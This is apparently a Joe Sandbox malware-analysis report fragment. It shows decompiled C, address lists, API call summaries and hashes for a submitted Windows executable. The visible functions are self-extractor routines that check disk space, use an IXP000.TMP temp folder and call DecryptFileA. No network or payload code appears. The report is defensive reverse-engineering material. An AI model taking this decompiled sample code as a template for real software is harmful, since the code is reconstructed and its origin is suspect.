                                                                                                                                                                                                                                      				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                      				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                      				if(_t50 != 0) {
                                                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                                                      					_v796 = 0;
                                                                                                                                                                                                                                      					_v792 = 0;
                                                                                                                                                                                                                                      					_v800 = 0;
                                                                                                                                                                                                                                      					_v808 = 0;
                                                                                                                                                                                                                                      					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                      					__eflags = _t55;
                                                                                                                                                                                                                                      					if(_t55 == 0) {
                                                                                                                                                                                                                                      						L29:
                                                                                                                                                                                                                                      						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                      						 *0x409124 = E00406233();
                                                                                                                                                                                                                                      						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                      						_t110 = 0x4b0;
                                                                                                                                                                                                                                      						L30:
                                                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                                                      						E00404495(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                      						L31:
                                                                                                                                                                                                                                      						_t66 = 0;
                                                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                                                      						L32:
                                                                                                                                                                                                                                      						_pop(_t114);
                                                                                                                                                                                                                                      						goto L33;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                      					_v812 = _t69;
                                                                                                                                                                                                                                      					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                      					__eflags = _t116;
                                                                                                                                                                                                                                      					if(_t116 == 0) {
                                                                                                                                                                                                                                      						goto L29;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                      					__eflags = _t73;
                                                                                                                                                                                                                                      					if(_t73 != 0) {
                                                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                      						_t101 =  &_v16;
                                                                                                                                                                                                                                      						_t111 = 6;
                                                                                                                                                                                                                                      						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                                                      							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                      							__eflags = _t22;
                                                                                                                                                                                                                                      							if(_t22 == 0) {
                                                                                                                                                                                                                                      								break;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                      							__eflags = _t87;
                                                                                                                                                                                                                                      							if(_t87 == 0) {
                                                                                                                                                                                                                                      								break;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							 *_t101 = _t87;
                                                                                                                                                                                                                                      							_t101 = _t101 + 1;
                                                                                                                                                                                                                                      							_t111 = _t111 - 1;
                                                                                                                                                                                                                                      							__eflags = _t111;
                                                                                                                                                                                                                                      							if(_t111 != 0) {
                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						__eflags = _t111;
                                                                                                                                                                                                                                      						if(_t111 == 0) {
                                                                                                                                                                                                                                      							_t101 = _t101 - 1;
                                                                                                                                                                                                                                      							__eflags = _t101;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						 *_t101 = 0;
                                                                                                                                                                                                                                      						_t112 = 0x200;
                                                                                                                                                                                                                                      						_t102 = _v812;
                                                                                                                                                                                                                                      						_t78 = 0;
                                                                                                                                                                                                                                      						_t118 = 8;
                                                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                                                      							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                      							if(_t102 == _t112) {
                                                                                                                                                                                                                                      								break;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                      							_t78 = _t78 + 1;
                                                                                                                                                                                                                                      							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                      							if(_t78 < _t118) {
                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                      						if(_t78 != _t118) {
                                                                                                                                                                                                                                      							__eflags =  *0x409a34 & 0x00000008;
                                                                                                                                                                                                                                      							if(( *0x409a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                      								L20:
                                                                                                                                                                                                                                      								_t103 =  *0x409a38; // 0x0
                                                                                                                                                                                                                                      								_t110 =  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                      								L21:
                                                                                                                                                                                                                                      								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                      								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                      									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                      									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                      										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                                                      									 *0x409124 = 0;
                                                                                                                                                                                                                                      									_t66 = 1;
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									_t66 = E0040268A(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                      							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_t105 =  *0x409a38; // 0x0
                                                                                                                                                                                                                                      							_t110 =  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                      							_t103 = (_t105 >> 2) +  *0x409a38;
                                                                                                                                                                                                                                      							goto L21;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t110 = 0x4c5;
                                                                                                                                                                                                                                      						E00404495(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      						goto L31;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                      					 *0x409124 = E00406233();
                                                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                      					_t110 = 0x4f9;
                                                                                                                                                                                                                                      					goto L30;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t110 = 0x4bc;
                                                                                                                                                                                                                                      					E00404495(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      					 *0x409124 = E00406233();
                                                                                                                                                                                                                                      					_t66 = 0;
                                                                                                                                                                                                                                      					L33:
                                                                                                                                                                                                                                      					return E00406C80(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}



































                                                                                                                                                                                                                                      0x00405933
                                                                                                                                                                                                                                      0x0040593e
                                                                                                                                                                                                                                      0x00405945
                                                                                                                                                                                                                                      0x00405950
                                                                                                                                                                                                                                      0x0040595c
                                                                                                                                                                                                                                      0x0040595e
                                                                                                                                                                                                                                      0x00405965
                                                                                                                                                                                                                                      0x0040596f
                                                                                                                                                                                                                                      0x00405993
                                                                                                                                                                                                                                      0x0040599a
                                                                                                                                                                                                                                      0x004059a7
                                                                                                                                                                                                                                      0x004059b4
                                                                                                                                                                                                                                      0x004059c1
                                                                                                                                                                                                                                      0x004059c9
                                                                                                                                                                                                                                      0x004059cf
                                                                                                                                                                                                                                      0x004059d1
                                                                                                                                                                                                                                      0x00405b57
                                                                                                                                                                                                                                      0x00405b65
                                                                                                                                                                                                                                      0x00405b73
                                                                                                                                                                                                                                      0x00405b8e
                                                                                                                                                                                                                                      0x00405b94
                                                                                                                                                                                                                                      0x00405b99
                                                                                                                                                                                                                                      0x00405ba2
                                                                                                                                                                                                                                      0x00405ba6
                                                                                                                                                                                                                                      0x00405bb2
                                                                                                                                                                                                                                      0x00405bb8
                                                                                                                                                                                                                                      0x00405bb8
                                                                                                                                                                                                                                      0x00405bb8
                                                                                                                                                                                                                                      0x00405bba
                                                                                                                                                                                                                                      0x00405bba
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405bba
                                                                                                                                                                                                                                      0x004059dd
                                                                                                                                                                                                                                      0x004059f0
                                                                                                                                                                                                                                      0x004059fc
                                                                                                                                                                                                                                      0x004059fe
                                                                                                                                                                                                                                      0x00405a00
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405a1a
                                                                                                                                                                                                                                      0x00405a20
                                                                                                                                                                                                                                      0x00405a22
                                                                                                                                                                                                                                      0x00405a72
                                                                                                                                                                                                                                      0x00405a78
                                                                                                                                                                                                                                      0x00405a7f
                                                                                                                                                                                                                                      0x00405a80
                                                                                                                                                                                                                                      0x00405a80
                                                                                                                                                                                                                                      0x00405a82
                                                                                                                                                                                                                                      0x00405a82
                                                                                                                                                                                                                                      0x00405a85
                                                                                                                                                                                                                                      0x00405a87
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405a89
                                                                                                                                                                                                                                      0x00405a8c
                                                                                                                                                                                                                                      0x00405a8e
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405a90
                                                                                                                                                                                                                                      0x00405a92
                                                                                                                                                                                                                                      0x00405a93
                                                                                                                                                                                                                                      0x00405a93
                                                                                                                                                                                                                                      0x00405a96
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405a96
                                                                                                                                                                                                                                      0x00405a98
                                                                                                                                                                                                                                      0x00405a9a
                                                                                                                                                                                                                                      0x00405a9c
                                                                                                                                                                                                                                      0x00405a9c
                                                                                                                                                                                                                                      0x00405a9c
                                                                                                                                                                                                                                      0x00405a9f
                                                                                                                                                                                                                                      0x00405aa1
                                                                                                                                                                                                                                      0x00405aa6
                                                                                                                                                                                                                                      0x00405aac
                                                                                                                                                                                                                                      0x00405aae
                                                                                                                                                                                                                                      0x00405aaf
                                                                                                                                                                                                                                      0x00405aaf
                                                                                                                                                                                                                                      0x00405ab1
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405ab3
                                                                                                                                                                                                                                      0x00405ab5
                                                                                                                                                                                                                                      0x00405ab6
                                                                                                                                                                                                                                      0x00405ab9
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405ab9
                                                                                                                                                                                                                                      0x00405abb
                                                                                                                                                                                                                                      0x00405abe
                                                                                                                                                                                                                                      0x00405ad6
                                                                                                                                                                                                                                      0x00405add
                                                                                                                                                                                                                                      0x00405b08
                                                                                                                                                                                                                                      0x00405b08
                                                                                                                                                                                                                                      0x00405b11
                                                                                                                                                                                                                                      0x00405b18
                                                                                                                                                                                                                                      0x00405b21
                                                                                                                                                                                                                                      0x00405b23
                                                                                                                                                                                                                                      0x00405b2c
                                                                                                                                                                                                                                      0x00405b33
                                                                                                                                                                                                                                      0x00405b39
                                                                                                                                                                                                                                      0x00405b35
                                                                                                                                                                                                                                      0x00405b35
                                                                                                                                                                                                                                      0x00405b35
                                                                                                                                                                                                                                      0x00405b25
                                                                                                                                                                                                                                      0x00405b28
                                                                                                                                                                                                                                      0x00405b28
                                                                                                                                                                                                                                      0x00405b3b
                                                                                                                                                                                                                                      0x00405b4e
                                                                                                                                                                                                                                      0x00405b54
                                                                                                                                                                                                                                      0x00405b3d
                                                                                                                                                                                                                                      0x00405b45
                                                                                                                                                                                                                                      0x00405b45
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405b3b
                                                                                                                                                                                                                                      0x00405adf
                                                                                                                                                                                                                                      0x00405ae9
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405aeb
                                                                                                                                                                                                                                      0x00405afe
                                                                                                                                                                                                                                      0x00405b00
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405b00
                                                                                                                                                                                                                                      0x00405ac5
                                                                                                                                                                                                                                      0x00405acc
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405acc
                                                                                                                                                                                                                                      0x00405a32
                                                                                                                                                                                                                                      0x00405a40
                                                                                                                                                                                                                                      0x00405a5b
                                                                                                                                                                                                                                      0x00405a61
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405971
                                                                                                                                                                                                                                      0x00405976
                                                                                                                                                                                                                                      0x0040597d
                                                                                                                                                                                                                                      0x00405987
                                                                                                                                                                                                                                      0x0040598c
                                                                                                                                                                                                                                      0x00405bbb
                                                                                                                                                                                                                                      0x00405bc8
                                                                                                                                                                                                                                      0x00405bc8

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 0040595E
                                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 00405965
                                                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 004059C9
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 004059F6
                                                                                                                                                                                                                                      • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00405A1A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405A32
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00405A4E
                                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00405A5B
                                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00405BB2
                                                                                                                                                                                                                                        • Part of subcall function 00404495: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004044F4
                                                                                                                                                                                                                                        • Part of subcall function 00404495: MessageBoxA.USER32(?,?,OxZQ,00010010), ref: 00404530
                                                                                                                                                                                                                                        • Part of subcall function 00406233: GetLastError.KERNEL32(00405B72), ref: 00406233
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4237285672-0
                                                                                                                                                                                                                                      • Opcode ID: 3cfdbe1bf39a03e5feb3f0dd66b8f1f79d66f2a24317197bbb7bf28217644742
                                                                                                                                                                                                                                      • Instruction ID: 1d5fedc96b6c7cf566ee36ba51e9c59107d578b93da5045c5db5684a87320d40
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cfdbe1bf39a03e5feb3f0dd66b8f1f79d66f2a24317197bbb7bf28217644742
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A171A5B1A0060CABE715DF24CD85BEB77BCEB48344F4440BAF545B6281D678AF458F29
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 498 402f10-402f30 499 402f32-402f39 498->499 500 402f5f-402f66 call 405124 498->500 502 402f52-402f59 call 403a2b 499->502 503 402f3b call 4051a5 499->503 508 403034 500->508 509 402f6c-402f73 call 40555a 500->509 502->500 502->508 510 402f40-402f42 503->510 512 403036-403044 call 406c80 508->512 509->508 516 402f79-402fb1 GetSystemDirectoryA call 406534 LoadLibraryA 509->516 510->508 513 402f48-402f50 510->513 513->500 513->502 520 402fb3-402fc7 GetProcAddress 516->520 521 402fea-402ff7 FreeLibrary 516->521 520->521 524 402fc9-402fe1 DecryptFileA 520->524 522 402ff9-402fff 521->522 523 40300a-403017 SetCurrentDirectoryA 521->523 522->523 525 403001 call 4061ce 522->525 526 403045-40304b 523->526 527 403019-40302f call 404495 call 406233 523->527 524->521 533 402fe3-402fe8 524->533 537 403006-403008 525->537 528 403056-40305d 526->528 529 40304d call 403b12 526->529 527->508 535 40306d-40307a 528->535 536 40305f-403066 call 402570 528->536 539 403052-403054 529->539 533->521 541 403092-40309a 535->541 542 40307c-403082 535->542 544 40306b 536->544 537->508 537->523 539->508 539->528 547 4030a5-4030a8 541->547 548 40309c-40309e 541->548 542->541 545 403084 call 403b8e 542->545 544->535 552 403089-40308b 545->552 547->512 548->547 549 4030a0 call 404153 548->549 549->547 552->508 553 40308d 552->553 553->541
                                                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                                                      			E00402F10(void* __ecx, int __edx) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v272;
                                                                                                                                                                                                                                      				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                                                      				signed int _t22;
                                                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                                                      				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                                                      				int _t47;
                                                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t43 = __edx;
                                                                                                                                                                                                                                      				_t9 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                      				if( *0x408a38 != 0) {
                                                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                                                      					_t11 = E00405124(_t52);
                                                                                                                                                                                                                                      					_t53 = _t11;
                                                                                                                                                                                                                                      					if(_t11 == 0) {
                                                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                                                      						_t12 = 0;
                                                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                                                      						return E00406C80(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t14 = E0040555A(_t53); // executed
                                                                                                                                                                                                                                      					if(_t14 == 0) {
                                                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						_t45 = 0x105;
                                                                                                                                                                                                                                      						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                      						_t43 = 0x105;
                                                                                                                                                                                                                                      						_t40 =  &_v272;
                                                                                                                                                                                                                                      						E00406534( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                      						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                      						_t44 = 0;
                                                                                                                                                                                                                                      						if(_t36 != 0) {
                                                                                                                                                                                                                                      							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                      							_v276 = _t31;
                                                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                                                      								_t45 = _t47;
                                                                                                                                                                                                                                      								_t40 = _t31;
                                                                                                                                                                                                                                      								 *0x40a288("C:\Users\Arthur\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                                                      								_v276();
                                                                                                                                                                                                                                      								if(_t47 != _t47) {
                                                                                                                                                                                                                                      									_t40 = 4;
                                                                                                                                                                                                                                      									asm("int 0x29");
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						FreeLibrary(_t36);
                                                                                                                                                                                                                                      						_t58 =  *0x408a24 - _t44; // 0x0
                                                                                                                                                                                                                                      						if(_t58 != 0) {
                                                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                                                      							_t21 = SetCurrentDirectoryA("C:\Users\Arthur\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                                                      							if(_t21 != 0) {
                                                                                                                                                                                                                                      								__eflags =  *0x408a2c - _t44; // 0x0
                                                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                                                      									__eflags =  *0x408d48 & 0x000000c0;
                                                                                                                                                                                                                                      									if(( *0x408d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                      										_t41 =  *0x409a40; // 0x3, executed
                                                                                                                                                                                                                                      										_t26 = E00402570(_t41); // executed
                                                                                                                                                                                                                                      										_t44 = _t26;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									_t22 =  *0x408a24; // 0x0
                                                                                                                                                                                                                                      									 *0x409a44 = _t44;
                                                                                                                                                                                                                                      									__eflags = _t22;
                                                                                                                                                                                                                                      									if(_t22 != 0) {
                                                                                                                                                                                                                                      										L26:
                                                                                                                                                                                                                                      										__eflags =  *0x408a38;
                                                                                                                                                                                                                                      										if( *0x408a38 == 0) {
                                                                                                                                                                                                                                      											__eflags = _t22;
                                                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                                                      												E00404153(__eflags);
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										_t12 = 1;
                                                                                                                                                                                                                                      										goto L17;
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										__eflags =  *0x409a30 - _t22; // 0x0
                                                                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                                                                      											goto L26;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										_t25 = E00403B8E(); // executed
                                                                                                                                                                                                                                      										__eflags = _t25;
                                                                                                                                                                                                                                      										if(_t25 == 0) {
                                                                                                                                                                                                                                      											goto L16;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										_t22 =  *0x408a24; // 0x0
                                                                                                                                                                                                                                      										goto L26;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								_t27 = E00403B12(_t40, _t44);
                                                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                                                      								if(_t27 == 0) {
                                                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_t43 = 0x4bc;
                                                                                                                                                                                                                                      							E00404495(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                      							 *0x409124 = E00406233();
                                                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t59 =  *0x409a30 - _t44; // 0x0
                                                                                                                                                                                                                                      						if(_t59 != 0) {
                                                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t30 = E004061CE(); // executed
                                                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t49 =  *0x408a24;
                                                                                                                                                                                                                                      				if( *0x408a24 != 0) {
                                                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                                                      					_t34 = E00403A2B(_t51);
                                                                                                                                                                                                                                      					_t52 = _t34;
                                                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if(E004051A5(_t49) == 0) {
                                                                                                                                                                                                                                      					goto L16;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t51 =  *0x408a38;
                                                                                                                                                                                                                                      				if( *0x408a38 != 0) {
                                                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				goto L4;
                                                                                                                                                                                                                                      			}




























                                                                                                                                                                                                                                      0x00402f10
                                                                                                                                                                                                                                      0x00402f1b
                                                                                                                                                                                                                                      0x00402f22
                                                                                                                                                                                                                                      0x00402f30
                                                                                                                                                                                                                                      0x00402f5f
                                                                                                                                                                                                                                      0x00402f5f
                                                                                                                                                                                                                                      0x00402f64
                                                                                                                                                                                                                                      0x00402f66
                                                                                                                                                                                                                                      0x00403034
                                                                                                                                                                                                                                      0x00403034
                                                                                                                                                                                                                                      0x00403036
                                                                                                                                                                                                                                      0x00403044
                                                                                                                                                                                                                                      0x00403044
                                                                                                                                                                                                                                      0x00402f6c
                                                                                                                                                                                                                                      0x00402f73
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402f79
                                                                                                                                                                                                                                      0x00402f79
                                                                                                                                                                                                                                      0x00402f86
                                                                                                                                                                                                                                      0x00402f91
                                                                                                                                                                                                                                      0x00402f93
                                                                                                                                                                                                                                      0x00402f99
                                                                                                                                                                                                                                      0x00402fab
                                                                                                                                                                                                                                      0x00402fad
                                                                                                                                                                                                                                      0x00402fb1
                                                                                                                                                                                                                                      0x00402fb9
                                                                                                                                                                                                                                      0x00402fbf
                                                                                                                                                                                                                                      0x00402fc7
                                                                                                                                                                                                                                      0x00402fc9
                                                                                                                                                                                                                                      0x00402fcb
                                                                                                                                                                                                                                      0x00402fd3
                                                                                                                                                                                                                                      0x00402fd9
                                                                                                                                                                                                                                      0x00402fe1
                                                                                                                                                                                                                                      0x00402fe3
                                                                                                                                                                                                                                      0x00402fe8
                                                                                                                                                                                                                                      0x00402fe8
                                                                                                                                                                                                                                      0x00402fe1
                                                                                                                                                                                                                                      0x00402fc7
                                                                                                                                                                                                                                      0x00402feb
                                                                                                                                                                                                                                      0x00402ff1
                                                                                                                                                                                                                                      0x00402ff7
                                                                                                                                                                                                                                      0x0040300a
                                                                                                                                                                                                                                      0x0040300f
                                                                                                                                                                                                                                      0x00403017
                                                                                                                                                                                                                                      0x00403045
                                                                                                                                                                                                                                      0x0040304b
                                                                                                                                                                                                                                      0x00403056
                                                                                                                                                                                                                                      0x00403056
                                                                                                                                                                                                                                      0x0040305d
                                                                                                                                                                                                                                      0x0040305f
                                                                                                                                                                                                                                      0x00403066
                                                                                                                                                                                                                                      0x0040306b
                                                                                                                                                                                                                                      0x0040306b
                                                                                                                                                                                                                                      0x0040306d
                                                                                                                                                                                                                                      0x00403072
                                                                                                                                                                                                                                      0x00403078
                                                                                                                                                                                                                                      0x0040307a
                                                                                                                                                                                                                                      0x00403092
                                                                                                                                                                                                                                      0x00403092
                                                                                                                                                                                                                                      0x0040309a
                                                                                                                                                                                                                                      0x0040309c
                                                                                                                                                                                                                                      0x0040309e
                                                                                                                                                                                                                                      0x004030a0
